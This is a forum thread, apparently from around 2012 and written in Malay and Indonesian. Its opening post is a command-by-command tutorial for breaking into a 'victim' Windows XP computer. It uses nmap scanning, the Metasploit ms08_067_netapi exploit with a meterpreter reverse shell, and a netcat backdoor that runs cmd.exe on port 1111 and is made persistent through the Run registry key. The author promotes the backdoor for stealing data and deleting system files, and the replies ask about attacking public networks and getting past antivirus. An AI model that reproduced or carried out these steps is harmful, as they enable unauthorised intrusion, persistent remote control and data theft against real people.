Upload Backdoor to the Victim Computer
#1
Penerangan:-
Tutorial kali ini adalah proses dimana kita dapat mengawal komputer mangsa hanya dengan menggunakan Backdoor yang telah kita masukkan ke dalam komputer mangsa. Komputer mangsa mestilah menggunakan Windows XP. JOM!!

Perkakasan Yang Diperlukan:-
1. Backtrack
2. Metasploit
3. NMap
4. NetCat

Langkah-Langkah:-
1. Buka terminal di Backtrack dan taip
Code:
# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
Secara automaticnya di Desktop Backtrack anda akan muncul satu fail nc.exe

2. Kemudian buka terminal baru (New Tab), taipkan kata arahan NMap IP Address mangsa untuk melihat OS yang digunakan
Code:
# nmap -sS -O [IP_MANGSA]
kata arahan diatas digunakan jika anda mempunyai IP Address Mangsa anda

Code:
# nmap -sS -O 192.168.1.1-255
kata arahan diatas digunakan jika anda ingin mencari mangsa secara rawak

Quote:Untuk tutorial ini, anda memerlukan mangsa yang menggunakan OS Microsoft Windows XP sahaja!

3. Setelah anda mempunyai mangsa, buka metasploit di terminal baru anda
Code:
# msfconsole

4. Kemudian taipkan kata arahan dibawah
Code:
> use exploit/windows/smb/ms08_067_netapi
Code:
> set payload windows/meterpreter/reverse_tcp
Code:
> set LHOST [IP_anda]
Code:
> set RHOST [IP_mangsa]
Code:
> exploit

5. Biarkan ianya running sehinggalah anda berjaya mendapatkan SESSION mangsa. Anda berjaya mendapatkan SESSION mangsa apabila satu kata arahan keluar iaitu

Code:
meterpreter >

6. Setelah itu, taipkan kata arahan dibawah untuk memasukkan Backdoor nc.exe tadi ke dalam komputer mangsa
Code:
> upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

7. Setelah proses muat naik selesai, sekarang ada proses untuk menyemak registry komputer mangsa
Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN

Quote:Proses ini juga untuk menjalankan Backdoor tadi setiap kali mangsa membuka komputer

8. Sekarang adalah proses untuk mendaftar backdoor nc.exe tadi ke registry komputer mangsa
Code:
> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe"

9. Sekarang pula adalah proses untuk menyemak backdoor yang telah dimasukkan ke registry mangsa
Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Quote:Anda akan mendapati Backdoor anda telah pon berada pada registry komputer mangsa

10. Reboot komputer mangsa
Code:
> reboot

11. Setelah komputer mangsa direboot, kini masanya untuk membuat penyambungan ke komputer mangsa dengan hanya menggunakan Backdoor kita tadi. Buka terminal anda dan taipkan kata arahan dibawah
Code:
# nc [IP_MANGSA] 1111

12. DONE! kini anda telah berada di System komputer mangsa.

13. Dengan backdoor, anda boleh buat apa sahaja termasuklah mencuri data, format, delete system32, masukkan virus dan sebagainya.

PERHATIAN: Ini adalah proses pembelajaran. Gunakanlah ia dijalan yang betol. Jadilah penggodam yang berguna dan bukannya perosak Smile

Maaf. Bahasa yang digunakan adalah Bahasa Malaysia, sekadar berkongsi dengan 2 buah negara yang saya sayang. Maaf juga kalau ada salah Smile
-=Reserved for screen shot=-
-= You will NEVER learn a new things IF you NEVER make a mistake =-
My Twitter: @c0d3br34k
IRC Server: irc.anonops.pro (c0d3br34k)

#2
kalo ke jaringan public gmn tuh kak Smile

#3
hahahaha thanks for share Tongue brooo
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#4
Thanks for share bro Big Grin

#5
ini cuma bisa di pake di LAN ya? Big Grin

#6
(03-09-2012, 03:33 PM)child Wrote: ini cuma bisa di pake di LAN ya? Big Grin

ga juga om tinggal gmana kepandaian kita aja Tongue teknik ini bisa di kombinasikan dengan teknik Sosial Engineering Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#7
kalau ada videonya lebih josss nih om Smile

#8
thnk's bro dah share ilmunya Smile
coba ah ntar kalo koneksinya dah lumayan kenceng Smile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#9
nice share omz,
but kalo target kita XP kan ga harus kita masang backdoor,
bisa langsung metasploit pada port 445.

kalo yang make W7 tapi kita metasploit ga pake backdoor ada ga omz.
atau metasploit dengan target melalui hotspot yang berbeda.


mohon di share ya omz kalo ada tutor baru
Big Grin

--------------------------
IBT - Regional Sumbar
Black Dragon
--------------------------

#10
om bgmna klo windows xp yang mengunakan anti virus avast...






Users browsing this thread: 1 Guest(s)